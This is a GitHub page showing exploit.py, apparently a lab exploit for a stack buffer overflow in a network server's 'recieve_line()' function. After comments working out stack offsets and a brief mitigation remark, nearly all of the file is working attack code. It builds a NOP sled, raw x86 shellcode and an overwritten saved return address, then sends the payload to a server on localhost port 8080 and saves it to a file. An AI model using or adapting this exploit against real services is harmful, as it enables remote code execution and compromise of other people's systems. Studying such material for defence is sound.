-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathexploit.py
executable file
·44 lines (31 loc) · 1.64 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
# Email : [email protected]
# Description : This exploit takes advantage of stack overflow vulnerability caused by no check on
# size of user input by 'recieve_line()' which causes the corruption of
# connection_handler()'s stack frame leading to an arbitrary code execution. The
# shellcode executed can be found in the shellcode directory.
# Remedy : To mitigate to this attack there should be a proper validation(i.e. bound checking) of
# user input in recieve_line(). Other mitigation techniques are provided by the OS which
# under circumstances are also bypassable :)
# Exploiting stack frame of connection_handler()
# esp: 0xbfffe710 ebp: 0xbffff2e8
# our input at address: 0xbfffeeec
# offset to ebp = 0xbffff2e8 - 0xbfffeeec = 1020 bytes
# offset to Return address = (offset to ebp) + 4 = 1024 bytes
import socket
import struct
shellcode = ("\xeb\x19\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb0\x04\xb3\x02\x59\xb2\x28\xcd\x80\x31\xc0\x89\xc3\xb0\x01\xcd\x80\xe8\xe2\xff\xff\xff\x0a\x0a\x7e\x7e\x7e\x7e\x4f\x77\x6e\x65\x64\x7e\x7e\x7e\x7e\x62\x79\x7e\x7e\x7e\x7e\x30\x78\x44\x61\x72\x6b\x4d\x61\x67\x69\x63\x69\x61\x6e\x7e\x7e\x7e\x7e\x0a\x0a")
NOP = "\x90"
# 1020 bytes
payload = NOP * (1024 - len(shellcode) - 100)
payload += shellcode
payload += "\x90" * 100
payload += struct.pack("I", 0xbffff010) # Overwriting Return Pointer (Saved EIP)
so = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
so.connect(('localhost', 8080))
so.send(payload)
so.close()
# Exporting malacious input file locally
# command - $ (cat malacious_input; cat) | telnet localhost 8080
fo = open('malacious_input', 'w')
fo.write(payload)
fo.close()